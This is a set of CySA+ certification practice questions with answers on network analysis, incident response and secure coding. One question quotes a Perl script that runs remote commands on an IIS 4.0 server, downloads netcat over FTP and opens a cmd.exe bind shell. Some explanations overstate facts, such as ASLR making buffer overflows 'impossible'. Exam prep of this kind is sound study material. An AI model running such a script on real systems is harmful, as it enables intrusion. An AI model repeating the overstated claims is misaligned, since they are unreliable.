CompTIA CySA+ Practice Test Dion


When using tcpdump, which option or flag would you use to record the ethernet frames during a packet capture? A. -nn B. -e C. -X D. -n

B. -e The -e option includes the ethernet header during packet capture. The -n flag will show the IP addresses in numeric form. The -nn option shows IP addresses and ports in numeric format. The -X option will capture the packet's payload in hex and ASCII formats.

What type of malware is designed to be difficult for malware analysts to reverse engineer? A. Rootkit B. Armored virus C. Trojan D. Logic bomb

B. Armored virus Armored viruses are a type of virus that use various techniques to protect themselves from being reverse engineered. These techniques include changing their code during execution and encrypting their payloads.

Richard attempted to visit a website and received a DNS response from the DNS cache server pointing to the wrong IP address. Which of the following attacks has occurred? A. MAC spoofing B. DNS poisoning C. DNS brute-forcing D. ARP spoofing

B. DNS poisoning DNS poisoning (also known as DNS cache poisoning or DNS spoofing) is a type of attack which uses security gaps in the Domain Name System (DNS) protocol to redirect internet traffic to malicious websites. MAC spoofing is a technique for changing a factory-assigned Media Access Control (MAC) address of a network interface on a networked device. ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network using layer 2 address information. DNS brute-forcing is used to check for wildcard entries using a dictionary or wordlist. This technique is used when a DNS zone transfer is not allowed by a system.

Dion Consulting Group has just won a contract to provide updates to an employee payroll system originally written years ago in C++. During your assessment of the source code, you notice the command "strcpy" is being used in the application. Which of the following is cause for concern, and what mitigation would you recommend to overcome it? A. strcpy could allow an integer overflow to occur; you should rewrite the entire system in Java B. strcpy could allow a buffer overflow to occur; upgrade the operating system to run ASLR to prevent a buffer overflow C. strcpy could allow a buffer overflow to occur; you should rewrite the entire system in Java D. strcpy could allow an integer overflow to occur; upgrade the operating system to run ASLR to prevent a buffer overflow

B. strcpy could allow a buffer overflow to occur; upgrade the operating system to run ASLR to prevent a buffer overflow C and C++ contain built-in functions such as strcpy that do not provide a default mechanism for checking if data will overwrite the boundaries of a buffer. The developer must identify such insecure functions and ensure that every call made to them by the program is performed securely. Many development projects use higher-level languages, such as Java, Python, and PHP. These interpreted languages will halt execution if an overflow condition is detected. However, changing languages may be infeasible in an environment that relies heavily on legacy code. By ensuring that the operating system supports ASLR, you can make it impossible for a buffer overflow to work by randomizing where objects in memory are being loaded. Rewriting the source code would be highly desirable but could be costly, time-consuming, and would not be an immediate mitigation to this problem. The strcpy function (which is short for String copy) does not work on integers, and it only works on strings. As strcpy does not check for boundary conditions, buffer overflows are certainly possible using this deprecated method.

A cybersecurity analyst is working at a college that wants to increase its network's security by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. Any proposed solution must scale up and down as new students and faculty use the network. Additionally, the analyst wants to minimize the number of false positives to ensure accuracy in their results. The chosen solution must also be centrally managed through an enterprise console. Which of the following scanning topologies would be BEST able to meet these requirements? A. Combination of server-based and agent-based scanning engines B. Combination of cloud-based and server-based scanning engines C. Active scanning engine installed on the enterprise console D. Passive scanning engine located at the core of the network infrastructure

C. Active scanning engine installed on the enterprise console

Dion Training wants to implement technology within their corporate network to BEST mitigate the risk that a zero-day virus might infect their workstations. Which of the following should be implemented FIRST? A. Host-based firewall B. Intrusion detection system C. Application allow list D. Anti-malware solution

C. Application allow list An application allow list only allows a program to execute if it is specifically listed in the approved exception list. All other programs are blocked from running. This makes it the BEST mitigation against a zero-day virus.

Fail to Pass Systems has just become the latest victim in a large-scale data breach by an APT. Your initial investigation confirms a massive exfiltration of customer data has occurred. Which of the following actions do you recommend to the CEO of Fail to Pass Systems in handling this data breach? A. Provide a statement to the press that minimizes the scope of the breach B. Conduct a 'hack-back' of the attacker to retrieve the stolen information C. Purchase a cyber insurance policy, alter the date of the incident in the log files, and file an insurance claim D. Conduct notification to all affected customers within 72 hours of the discovery of the breach

D. Conduct notification to all affected customers within 72 hours of the discovery of the breach Generally speaking, most laws, such as the GDPR, require notification within 72 hours.

Which one of the following methods would provide the most current and accurate information about any vulnerabilities present in a system with a misconfigured operating system setting? A. Scheduled vulnerability scanning B. Continuous vulnerability scanning C. On-demand vulnerability scanning D. Agent-based monitoring

D. Agent-based monitoring An agent-based monitoring solution would be the best choice to meet these requirements. Agent-based monitoring provides more details of the configuration settings for a system and can provide an internal perspective. While vulnerability scans can give you a snapshot of a system's status at a certain time, they will not remain current and accurate without continual rescanning.

What information should be recorded on a chain of custody form during a forensic investigation? A. The list of former owners/operators of the workstation involved in the investigation B. The law enforcement agent who was first on the scene C. The list of individuals who made contact with files leading to the investigation D. Any individual who worked with evidence during the investigation

D. Any individual who worked with evidence during the investigation Chain of custody forms list every person who has worked with or who has touched the evidence that is a part of an investigation. These forms record every action taken by each individual in possession of the evidence. Depending on the organization's procedures, manipulation of evidence may require an additional person to act as a witness to verify whatever action is being taken. While the chain of custody would record who initially collected the evidence, it does not have to record who was the first person on the scene (if that person didn't collect the evidence). The other options presented by the question are all good pieces of information to record in your notes, but they are not required to be on the chain of custody form.

Tim is working to prevent any remote login attacks to the root account of a Linux system. What method would be the best option to stop attacks like this while still allowing normal users to connect using ssh? A. Add a network IPS rule to block root logins B. Add root to the sudoers group C. Add an iptables rule blocking root logins D. Change sshd_config to deny root login

D. Change sshd_config to deny root login Linux systems use the sshd (SSH daemon) to provide ssh connectivity. If Tim changes the sshd_config to deny root logins, it will still allow any authenticated non-root user to connect over ssh. The sshd service has a configuration setting that is named PermitRootLogin. If you set this configuration setting to no or deny, all root logins will be denied by the ssh daemon. If you didn't know about this setting, you could still answer this question by using the process of elimination. An iptables rule is a Linux firewall rule, and this would block the port for ssh, not the root login. Adding root to the sudoers group won't help either since the sudoers group allows users to login as root. If you have a network IPS rule to block root logins, the IPS would have to see the traffic being sent within the SSH tunnel. This is not possible since SSH connections are encrypted end-to-end by default. Therefore, the only possible right answer is to change the sshd_config setting to deny root logins.

You are searching a Linux server for a possible backdoor during a forensic investigation. Which part of the file system should you search for evidence of a backdoor related to a Linux service? A. /etc/xinetd.conf B. /etc/passwd C. $HOME/.ssh/ D. /etc/shadow

A. /etc/xinetd.conf Linux services are started by xinetd, but some newer versions use systemctl. Therefore, /etc/xinetd.conf should be analyzed for any evidence of a backdoor being started as part of the Linux services. Both the /etc/passwd and /etc/shadow files contain configurations specifically associated with individual user accounts. The $HOME/.ssh/ directory contains SSH keys for SSH-based logins.

Consider the following REGEX search string: \b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b Which of the following strings would NOT be included in the output of this search? A. 37.259.129.207 B. 1.2.3.4 C. 205.255.255.001 D. 001.02.3.40

A. 37.259.129.207 The \b delimiter indicates that we are looking for whole words for the complete string. The REGEX is made up of four identical repeating groups, (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\. For now, let us refer to these as octets, such as the ones used in internet protocol version 4 addresses. Each octet allows 25[0-5] OR (|) 2[0-4][0-9] OR a number 0-99 optionally (?) preceded by a 0 or 1, followed by a ".". Since the period is treated as a special character in a REGEX operator, the escape character (\) is required to enable the symbol to act as a dot or period in the output. This sequence repeats four times, allowing for all variations of normal IP addresses to be entered for values 0-255. Since 259 is outside the range of 255, this is rejected. More specifically, character strings starting with 25 must end with a number between 0 and 5 (25[0-5]). Therefore, 259 would be rejected. Now, on exam day, if you received a question like this, you can try to figure out the pattern as explained above, or you can take the logical shortcut. The logical shortcut is to look at the answer first and see that they all look like IP addresses. Remember, grep and REGEX are used by a cybersecurity analyst to search logs for indicators of compromise (like an IP address), so don't be afraid to take a logical guess if you need to conserve time during your exam. So, which one isn't a valid IP address? Clearly, 37.259.129.207 is not a valid IP address, so if you had to guess as to what wouldn't be an output of this complex-looking command, you should guess that one!

A cybersecurity analyst notices the following XML transaction while reviewing the communication logs for a public-facing application that receives XML input directly from its clients: Based on the output above, which of the following is true? A. An XML External Entity (XXE) vulnerability has been exploited and the attacker may have downloaded the passwd file B. There is no concern since passwd does not contain any system passwords C. ISO-8859-1 only covers the Latin alphabet and may preclude other languages from being used D. The application is using parameterized queries to prevent XML injections

A. An XML External Entity (XXE) vulnerability has been exploited and the attacker may have downloaded the passwd file

Which mobile device strategy is most likely to introduce vulnerable devices to a corporate network? A. BYOD B. CYOD C. COPE D. MDM

A. BYOD The BYOD (bring your own device) strategy opens a network to many vulnerabilities. People can bring their personal devices to the corporate network, and their devices may contain vulnerabilities that could be allowed to roam free on a corporate network. COPE (company-owned/personally enabled) means that the company provides the users with a smartphone primarily for work use, but basic functions such as voice calls, messaging, and personal applications are allowed, with some controls on usage and flexibility. With CYOD, the user can choose which device they wish to use from a small selection of devices approved by the company. The company then buys, procures, and secures the device for the user. The MDM is a mobile device management system that gives centralized control over COPE company-owned personally enabled devices.

You have received a laptop from a user who recently left the company. You went to the terminal in the operating system, typed 'history' into the prompt, and saw the following: for i in $(seq 255); do ping -c 1 10.1.0.$i; done Which of the following best describes what actions were performed by this line of code? A. Conducted a ping sweep of the subnet B. Attempted to conduct a SYN scan on the network C. Sequentially sent 255 ping packets to every host on the subnet D. Conducted a sequential ICMP echo reply to the subnet

A. Conducted a ping sweep of the subnet This code is performing a ping sweep of the subnet 10.1.0.0/24. The code states that for every number in the sequence from 1 to 255, conduct a single ping to 10.1.0.x, where x is the number from 1 to 255. When it completes this sequence, it is to return to the terminal prompt (done). The ping command uses an echo request and then receives an echo reply from the ping's target. A ping sweep does not use a SYN scan, which would require the use of a tool like nmap or hping.

During a vulnerability scan of your network, you identified a vulnerability on an appliance installed by a vendor on your network under an ongoing service contract. You do not have access to the appliance's operating system as the device was installed under a support agreement with the vendor. What is your best course of action to remediate or mitigate this vulnerability? A. Contact the vendor to provide an update or to remediate the vulnerability B. Try to gain access to the underlying operating system and install the patch C. Mark the identified vulnerability as a false positive D. Wait 30 days, run the scan again, and determine if the vendor corrected the vulnerability

A. Contact the vendor to provide an update or to remediate the vulnerability

You are deploying OpenSSL in your organization and must select a cipher suite. Which of the following ciphers should NOT be used with OpenSSL? A. DES B. RSA C. AES D. ECC

A. DES DES is outdated and should not be used for any modern applications. AES, RSA, and ECC are all current secure alternatives that could be used with OpenSSL. This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!

In which phase of the security intelligence cycle is published information relevant to security issues provided to those who need to act on that information? A. Collection B. Dissemination C. Feedback D. Analysis

B. Dissemination The dissemination phase refers to publishing information produced by analysis to consumers who need to develop the insights. The collection phase is usually implemented by administrators using various software suites, such as security information and event management (SIEM).

Which of the following methods should a cybersecurity analyst use to locate any instances on the network where passwords are being sent in cleartext? A. SIEM event log monitoring B. Full packet capture C. Net flow capture D. Software design documentation review

B. Full packet capture Full packet capture records the complete payload of every packet crossing the network. The other methods will not provide sufficient information to detect a cleartext password being sent. A net flow analysis will determine where communications occurred, by what protocol, to which devices, and how much content was sent. Still, it will not reveal anything about the content itself since it only analyzes the metadata for each packet crossing the network.

Yoyodyne Systems has recently bought out its competitor, Whamiedyne Systems, which went out of business due to a series of data breaches. As a cybersecurity analyst for Yoyodyne, you are assessing Whamiedyne's existing applications and infrastructure. During your analysis, you discover the following URL is used to access an application: https://www.whamiedyne.com/app/accountInfo?acct=12345 You change the URL to end with 12346 and notice that a different user's account information is displayed. Which of the following types of vulnerabilities or threats have you discovered? A. Insecure direct object reference B. XML injection C. Race condition D. SQL injection

A. Insecure direct object reference This is an example of an insecure direct object reference. Direct object references are typically insecure when they do not verify whether a user is authorized to access a specific object. Therefore, it is important to implement access control techniques in applications that work with private information or other sensitive data types. Based on the URL above, you cannot determine if the application is vulnerable to an XML or SQL injection attack. In a SQL injection attack, an attacker modifies the database's basic functions by adding code to some input within the web app, causing it to execute the attacker's own set of queries using SQL. An XML injection is similar but focuses on XML code instead of SQL queries. A race condition is a software vulnerability where the resulting outcome of execution processes is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing the developer intended; that is not the case in this scenario.

Fail to Pass Systems has suffered a data breach. Your analysis of suspicious log activity traced the source of the data breach to a personally owned smartphone belonging to an employee in the accounting department, connected to the company's wireless network. The smartphone has now been isolated from the network, but the employee refuses to allow you to image her smartphone to complete your forensic investigation. According to the employee, the company's BYOD policy does not require her to give you her device, and doing so would be an invasion of her privacy. Which of the following phases of the incident response process is at fault for creating this situation? A. Preparation phase B. Containment phase C. Detection and analysis phase D. Eradication and recovery phase

A. Preparation phase As part of the preparation phase, obtaining authorization to seize devices (including personally owned electronics) should have been made clear and consented to by all employees. If the proper requirements were placed into the BYOD policy before the incident occurred, this would have prevented this situation.

Which of the following roles should coordinate communications with the media during an incident response? A. Public relations B. Human resources C. Senior leadership D. System administrators

A. Public relations Public relations staff should be included in incident response teams to coordinate communications with the general public and the media to manage any negative publicity from a serious incident. Information about the incident should be released in a controlled way when appropriate through known press and external public relations agencies. Senior leadership should be focused on how the incident affects their departments or functional areas to make the best decisions. The senior leadership should not talk to the media without guidance from the public relations team. System administrators are part of the incident response team since they know the network's normal baseline behavior and its system better than anyone else. System administrators should not talk to the media during an incident response. Human resources are part of the incident response team to appropriately contact any suspected insider threats and ensure no breaches of employment law or employment contracts are made.

Dion Training wants to require students to log on using multifactor authentication to increase the security of the authorization and authentication process. Currently, students log in to diontraining.com using a username and password. What proposed solution would best meet the goal of enabling multifactor authentication for the student login process? A. Require students to enter a unique six-digit number that is sent to them by SMS after entering their username and password B. Require students to choose an image to serve as a secondary password after logon C. Require students to enter a cognitive password requirement (such as 'What is your dog's name?') D. Require students to create a unique pin that is entered after their username and password are accepted

A. Require students to enter a unique six-digit number that is sent to them by SMS after entering their username and password

You just visited an e-commerce website by typing in its URL during a vulnerability assessment. You discovered that an administrative web frontend for the server's backend application is accessible over the internet. Testing this frontend, you discovered that the default password for the application is accepted. Which of the following recommendations should you make to the website owner to remediate this discovered vulnerability? (SELECT THREE) A. Require two-factor authentication for access to the application B. Change the username and default password C. Require an alphanumeric passphrase for the application's default password D. Create an allow list for the specific IP blocks that use this application E. Conduct a penetration test against the organization's IP space F. Rename the URL to a more obscure name

A. Require two-factor authentication for access to the application B. Change the username and default password D. Create an allow list for the specific IP blocks that use this application First, you should change the username and default password since using default credentials is extremely insecure. Second, you should implement an allow list for any specific IP blocks with access to this application's administrative web frontend since it should only be a few system administrators and power users. Next, you should implement two-factor authentication to access the application since two-factor authentication provides more security than a simple username and password combination. You should not rename the URL to a more obscure name since security by obscurity is not considered a good security practice. You also should not require an alphanumeric passphrase for the application's default password. Since it is a default password, you cannot change the password requirements without the vendor conducting a software update to the application. Finally, while it may be a good idea to conduct a penetration test against the organization's IP space to identify other vulnerabilities, it will not positively affect remediating this identified vulnerability.

You are developing your vulnerability scanning plan and attempting to scope your scans properly. You have decided to focus on the criticality of a system to the organization's operations when prioritizing the system in the scope of your scans. Which of the following would be the best place to gather the criticality of a system? A. Ask the CEO for a list of the critical systems B. Review the asset inventory and BCP C. Conduct a nmap scan of the network to determine the OS of each system D. Scope the scan based on IP subnets

B. Review the asset inventory and BCP You can review the business continuity plan (BCP) since it provides the organization's plan for continuing business operations in the event of a disaster or other outage. Generally, the systems or operations listed in a BCP are the most critical ones to support business operations.

What describes the infrastructure needed to support the other architectural domains in the TOGAF framework? A. Technical architecture B. Business architecture C. Data architecture D. Applications architecture

A. Technical architecture TOGAF is a prescriptive framework that divides the enterprise architecture into four domains. Technical architecture describes the infrastructure needed to support the other architectural domains. Business architecture defines governance and organization and explains the interaction between enterprise architecture and business strategy. Applications architecture includes the applications and systems an organization deploys, the interactions between those systems, and their relation to the business processes. Data architecture provides the organization's approach to storing and managing information assets. This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!

You are attempting to prioritize your vulnerability scans based on the data's criticality. This will be determined by the asset value of the data contained in each system. Which of the following would be the most appropriate metric to use in this prioritization? A. The type of data processed by the system B. The cost of hardware replacement of the system C. The depreciated hardware cost of the system D. The cost of acquisition of the system

A. The type of data processed by the system

You are investigating traffic involving three separate IP addresses (192.168.66.6, 10.66.6.10, and 172.16.66.1). Which REGEX expression would you use to be able to capture ONLY those three IP addresses in a single statement? A. \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b B. \b(192\.168\.66\.6)+(10\.66\.6\.10)+(172\.16\.66\.1)\b C. \b[192\.168\.66\.6]+[10\.66\.6\.10]+[172\.16\.66\.1]\b D. \b[192\.168\.66\.6]|[10\.66\.6\.10]|[172\.16\.66\.1]\b

A. \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b The correct option is \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b, which uses parentheses and "OR" operators (|) to delineate the possible whole-word variations of the three IP addresses. Using square brackets indicates that any single one of the characters contained in the brackets is matching criteria. Using the + operator indicates an allowance for one or more instances of the preceding element. In all cases, the period must have an escape (\) sequence preceding it as the period is a reserved operator internal to REGEX.

Lamont is in the process of debugging a software program. As he examines the code, he discovers that it is miswritten. Due to the error, the code does not validate a variable's size before allowing the information to be written into memory. Based on Lamont's discovery, what type of attack might occur? A. Cross-site scripting B. Buffer overflow C. SQL injection D. Malicious logic

B. Buffer overflow A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common security attack on data integrity. In buffer overflow attacks, the extra data may contain code designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information. To prevent this type of attack, programs should validate the variable's size before writing the data to memory to ensure that the variable fits into the buffer.

Which of the following protocols is commonly used to collect information about CPU utilization and memory usage from network devices? A. SMTP B. SNMP C. MIB D. NetFlow

B. SNMP Simple Network Management Protocol (SNMP) is commonly used to gather information from routers, switches, and other network devices. It provides information about a device's status, including CPU and memory utilization, and many other useful details about the device. NetFlow provides information about network traffic. A management information base (MIB) is a database used for managing the entities in a communication network. The Simple Mail Transfer Protocol (SMTP) is a communication protocol for electronic mail transmission.

A penetration tester discovered a legacy web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the webserver. While the msadc.pl script is effective, the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a Perl script that runs the following msadc commands:
system("perl msadc.pl -h $host -C \"echo $user>>tempfile\" ");
system("perl msadc.pl -h $host -C \"echo $pass>>tempfile\" ");
system("perl msadc.pl -h $host -C \"echo bin>>tempfile\" ");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>tempfile\" ");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>tempfile\" ");
system("perl msadc.pl -h $host -C \"echo quit>>tempfile\" ");
system("perl msadc.pl -h $host -C \"ftp \-s\:tempfile\" ");
$o=<STDIN>;
print "Opening FTP connection...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\" ");
Which exploit type is indicated by this script? A. Buffer overflow exploit B. Chained exploit C. SQL injection exploit D. Denial of Service exploit

B. Chained exploit The script is an example of a chained exploit because it combines several programs into one, including writing to a temporary file, netcat usage, and FTP usage. Chained exploits integrate more than one form of attack to accomplish their goal. A buffer overflow is an anomaly that occurs when a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor's actions.

In which phase of the security intelligence cycle is information from several different sources aggregated into useful repositories? A. Dissemination B. Collection C. Feedback D. Analysis

B. Collection The collection phase is usually implemented by administrators using various software suites, such as security information and event management (SIEM). This software must be configured with connectors or agents that can retrieve data from sources such as firewalls, routers, IDS sensors, and servers. The analysis phase focuses on converting collected data into useful information or actionable intelligence. The dissemination phase refers to publishing information produced by analysis to consumers who need to develop the insights. The final phase of the security intelligence cycle is feedback and review, which utilizes both intelligence producers' and intelligence consumers' input. This phase aims to improve the implementation of the requirements, collection, analysis, and dissemination phases as the life cycle is developed.

A cybersecurity analyst is analyzing what they believe to be an active intrusion into their network. The indicator of compromise maps to a suspected nation-state group that has strong financial motives, APT 38. Unfortunately, the analyst finds their data correlation lacking and cannot determine which assets have been affected, so they begin to review the list of network assets online. The following servers are currently online: PAYROLL_DB, DEV_SERVER7, FIREFLY, DEATHSTAR, THOR, and DION. Which of the following actions should the analyst conduct first? A. Conduct a Nessus scan of the FIREFLY server B. Conduct a data criticality and prioritization analysis C. Hardening the DEV_SERVER7 server D. Logically isolate the PAYROLL_DB server from the production network

B. Conduct a data criticality and prioritization analysis While the payroll server could be assumed to hold PII, financial information, and corporate information, the analyst would only be making that assumption based on its name. Even before an incident response occurs, it would be a good idea to conduct a data criticality and prioritization analysis to determine what assets are critical to your business operations and need to be prioritized for protection. After an intrusion occurs, this information could be used to better protect and defend those assets against an attacker. Since the question states the analyst is trying to determine which server to look at based on their names, it is clear this organization never performed a data criticality and prioritization analysis and should do that first. After all, with names like FIREFLY, DEATHSTAR, THOR, and DION, the analyst has no idea what is stored on those systems. For example, how do we know that DEATHSTAR doesn't contain their credit card processing systems, which would be a more lucrative target for APT 38 than the PAYROLL_DB? The suggestions of hardening, logically isolating, or conducting a vulnerability scan of a particular server are random guesses by the analyst since they don't know which data they should focus on protecting or where the attacker is currently.

Following a root cause analysis of an edge router's unexpected failure, a cybersecurity analyst discovered that the system administrator had purchased the device from an unauthorized reseller. The analyst suspects that the router may be a counterfeit device. Which of the following controls would have been most effective in preventing this issue? A. Verify that all routers are patched to the latest release B. Conduct secure supply chain management training C. Ensure all anti-virus signatures are up to date D. Increase network vulnerability scan frequency

B. Conduct secure supply chain management training Anti-counterfeit training is part of the NIST 800-53r4 control set (SA-19(1)) and should be a mandatory part of your supply chain management training within your organization. All other options may produce security gains in the network, but they are unlikely to reliably detect a counterfeit item or prevent its introduction into the organization's supply chain. Training on detection methodologies (i.e., simple visual inspections) and training for acquisition personnel will better prevent recurrences.

You are a security investigator at a high-security installation that houses significant amounts of valuable intellectual property. You are investigating the utilization of George's credentials and are trying to determine if his credentials were compromised or if he is an insider threat. In the break room, you overhear George telling a coworker that he believes he is the target of an ongoing investigation. Which of the following steps in the preparation phase of the incident response was likely missed? A. Developing a proper incident response form B. Development of a communication plan C. Conduct background screenings on all applicants D. Creating a call list or escalation list

B. Development of a communication plan An established and agreed-upon communication plan, which may also include a non-disclosure agreement, should be put in place to prevent the targets of ongoing insider threat investigations from becoming aware of it. Even if it was later determined that George was innocent, the knowledge that he was being investigated could be damaging to both him and the company. If he was an insider threat who now suspects he is under investigation, he could take steps to cover his tracks or conduct destructive action. While background screenings may prevent some people from becoming insiders, it would not prevent the unauthorized disclosure of information concerning the investigation. A call list/escalation list will help manage this kind of problem and keep the right people informed, but it will not explicitly deal with the issue of inadvertent disclosure. Similarly, a proper incident response form may include guidance for communication but would have been orchestrated as part of a larger communications plan that detailed the proper channels to use.

Dion Training allows its visiting business partners from CompTIA to use an available Ethernet port in their conference room to establish a VPN connection back to the CompTIA internal network. The CompTIA employees should obtain internet access from the Ethernet port in the conference room, but nowhere else in the building. Additionally, if any of the Dion Training employees use the same Ethernet port in the conference room, they should access Dion Training's secure internal network. Which of the following technologies would allow you to configure this port and support both requirements? A. MAC filtering B. Implement NAC C. Configure a SIEM D. Create an ACL to allow access

B. Implement NAC Network Access Control (NAC) uses a set of protocols to define and implement a policy that describes how to secure access to network nodes whenever a device initially attempts to access the network. NAC can utilize an automatic remediation process by fixing non-compliant hosts before allowing network access. Network Access Control can control access to a network with policies, including pre-admission endpoint security policy checks and post-admission controls over where users and devices can go on a network and what they can do. In this scenario, implementing NAC can identify which machines are known and trusted Dion Training assets and provide them with access to the secure internal network. NAC could also identify unknown machines (assumed to be those of CompTIA employees) and provide them with direct internet access only by placing them onto a guest network or VLAN. While MAC filtering could be used to allow or deny access to the network, it cannot by itself control which set of network resources could be utilized from a single ethernet port. A security information and event management (SIEM) system provides real-time analysis of security alerts generated by applications and network hardware. An access control list could define which ports, protocols, or IP addresses could be utilized from the ethernet port. Still, it would be unable to distinguish between a Dion Training employee's laptop and a CompTIA employee's laptop like a NAC implementation could.

You received an incident response report indicating a piece of malware was introduced into the company's network through a remote workstation connected to the company's servers over a VPN connection. Which of the following controls should be applied to prevent this type of incident from occurring again? A. MAC filtering B. NAC C. ACL D. SPF

B. NAC Network Access Control (NAC) is an approach to computer security that attempts to unify endpoint security technology (such as anti-virus, host intrusion prevention, and vulnerability assessment), user or system authentication, and network security enforcement. When a remote workstation connects to the network, NAC will place it into a segmented portion of the network (sandbox), scan it for malware and validate its security controls, and then based on the results of those scans, either connect it to the company's networks or place the workstation into a separate quarantined portion of the network for further remediation. An access control list (ACL) is a network traffic filter that can control incoming or outgoing traffic. An ACL alone would not have prevented this issue. MAC Filtering refers to a security access control method whereby the MAC address assigned to each network card is used to determine access to the network. MAC filtering operates at layer 2 and is easy to bypass. Sender Policy Framework (SPF) is an email authentication method designed to detect forged sender addresses during email delivery.

A cybersecurity analyst is conducting a port scan of 192.168.1.45 using nmap. During the scan, the analyst found numerous ports open, and nmap could not determine the Operating System version of the system installed at 192.168.1.45. The analyst asks you to look over their nmap scan results: # nmap 192.168.1.45 Starting NMAP 7.60 at 2020-06-12 21:23:15 NMAP scan report for 192.168.1.45 Host is up (0.78s latency). Not shown: 992 closed ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 25/tcp open smtp 80/tcp open http 139/tcp open netbios-ssn 515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 00:0C:29:18:6B:D8 Which of the following operating systems is most likely used by the host? A. Linux server B. Networked printer C. Windows server D. Windows workstation

B. Networked printer Based on the open ports, it is likely that the host is a networked printer. Port 515 is used as an LPR/LPD port for most printers and older print servers. Port 631 is used for IPP for most modern printers and CUPS-based print servers. Port 9100 is used as a RAW port for most printers and is also known as the direct-IP port. If any of these three ports are found, the host is likely a printer. If ports 135, 139, and 445 are found, this is usually a good indication of a Windows file server. Ports such as FTP, telnet, SMTP, and HTTP are used by both Windows and Linux servers; therefore, they are not as helpful in indicating which operating system is in use by the host.

Which of the following options places the correct phases of the Software Development Lifecycle's waterfall method in the correct order? A. Planning, requirements analysis, design, implementation, deployment, testing, maintenance B. Planning, requirements analysis, design, implementation, testing, deployment, and maintenance C. Requirements analysis, planning, design, implementation, testing, deployment, and maintenance D. Requirements analysis, planning, design, implementation, deployment, testing, maintenance

B. Planning, requirements analysis, design, implementation, testing, deployment, and maintenance The software development lifecycle (SDLC) can be conducted using waterfall or agile methods. The waterfall method moves through seven phases: planning, requirements, design, implementation, testing, deployment, and maintenance. Planning involves training the developers and testers in security issues, acquiring security analysis tools, and ensuring the development environment's security. Requirements analysis is used to determine security and privacy needs in terms of data processing and access controls. Design identifies threats and controls or secure coding practices to meet the requirements. Implementation performs known environment source code analysis and code reviews to identify and resolve vulnerabilities. Testing performs known or unknown environment testing to test for vulnerabilities in the published application and its publication environment. Deployment installs and operates the software packages and best practice configuration guides. Maintenance involves ongoing security monitoring and incident response procedures, patch development and management, and other security controls. For a question like this on the real certification exam, you may be asked to drag and drop the seven steps into the proper order instead of receiving this as a multiple-choice question.

Which of the following is the biggest advantage of using Agile software development? A. Its structured and phase-oriented approach ensures that customer requirements are rigorously defined before development begins B. Reacts quickly to changing customer requirements since it allows all phases of software development to run in parallel C. Its inherent agility allows developers to maintain focus on the overall goals of the project D. It can produce better, more secure, and more efficient code

B. Reacts quickly to changing customer requirements since it allows all phases of software development to run in parallel

What remediation strategies are the MOST effective in reducing the risk to an embedded ICS from a network-based compromise? (Select TWO) A. NIDS B. Segmentation C. Patching D. Disabling unused services

B. Segmentation D. Disabling unused services Segmentation is the best method to reduce the risk to an embedded ICS system from a network-based compromise. Additionally, you could disable unused services to reduce the footprint of the embedded ICS. Many of these embedded ICS systems have a large number of default services running. So, by disabling the unused services, we can better secure these devices. By segmenting the devices off the main portion of the network, we can also better protect them. A NIDS might detect an attack or compromise, but it would not reduce the risk of the attack succeeding since it can only detect it. Patching is difficult for embedded ICS devices since they usually rely on customized software applications that rarely provide updates.

Rory is about to conduct forensics on a virtual machine. Which of the following processes should be used to ensure that all of the data is acquired forensically? A. Shut down the virtual machine and make a forensic copy of its disk image B. Suspend the machine and copy the contents of the directory it resides in C. Perform a live acquisition of the virtual machine's memory D. Suspend the machine and make a forensic copy of the drive it resides on

